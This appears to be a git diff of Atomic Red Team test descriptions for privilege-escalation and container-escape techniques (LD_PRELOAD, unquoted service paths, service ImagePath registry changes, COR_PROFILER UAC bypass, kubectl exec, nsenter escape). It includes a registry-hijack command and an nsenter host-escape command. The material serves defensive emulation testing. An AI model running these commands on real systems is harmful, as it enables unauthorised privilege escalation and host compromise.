## Atomic Test #2 - Shared Library Injection via LD_PRELOAD - -auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. + **Supported Platforms:** Linux +**auto_generated_guid:** bc219ff7-789f-4d51-9142-ecae3397deae + + + #### Inputs: diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md index ffc87c80..b32b1035 100644 --- a/atomics/T1574.009/T1574.009.md +++ b/atomics/T1574.009/T1574.009.md @@ -14,15 +14,17 @@ This technique can be used for persistence if executables are called on a regula
## Atomic Test #1 - Execution of program.exe as service with unquoted service path - -auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 2770dea7-c50f-457b-84c4-c40a47460d9f + + + #### Inputs: diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index 18600716..821ed917 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -16,14 +16,16 @@ Adversaries may also alter Registry keys associated with service failure paramet
## Atomic Test #1 - Service Registry Permissions Weakness - -auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + **Supported Platforms:** Windows +**auto_generated_guid:** f7536d63-7fd4-466f-89da-7e48d550752a + + + #### Inputs: @@ -49,13 +51,15 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
## Atomic Test #2 - Service ImagePath Change with reg.exe - -auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - Change Service registry ImagePath of a bengin service to a malicious file + **Supported Platforms:** Windows +**auto_generated_guid:** f38e9eea-e1d7-4ba6-b716-584791963827 + + + #### Inputs: diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md index 958aac95..693d673f 100644 --- a/atomics/T1574.012/T1574.012.md +++ b/atomics/T1574.012/T1574.012.md @@ -18,9 +18,6 @@ Adversaries may abuse COR_PROFILER to establish persistence that executes a mali
## Atomic Test #1 - User scope COR_PROFILER - -auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. @@ -28,9 +25,14 @@ If the account used is not a local administrator the profiler DLL will still exe the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + + + #### Inputs: @@ -82,18 +84,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - System Scope COR_PROFILER - -auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** f373b482-48c8-4ce4-85ed-d40c8b3f7310 + + + #### Inputs: @@ -141,15 +145,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Registry-free process scope COR_PROFILER - -auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 79d57242-bbef-41db-b301-9d01d9f6e817 + + + #### Inputs: diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index 292c6f39..e3aaf7bd 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -12,13 +12,15 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
## Atomic Test #1 - ExecIntoContainer - -auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b - Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b + + + #### Inputs: diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md index c1e1dbd6..6b91bb16 100644 --- a/atomics/T1610/T1610.md +++ b/atomics/T1610/T1610.md @@ -12,17 +12,19 @@ Containers can be deployed by various means, such as via Docker's create ## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 58004e22-022c-4c51-b4a8-2b85ac5c596b - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 58004e22-022c-4c51-b4a8-2b85ac5c596b + + + diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index b39e3b53..910e11e7 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -12,17 +12,19 @@ There are multiple ways an adversary may escape to a host environment. Examples
## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff + + +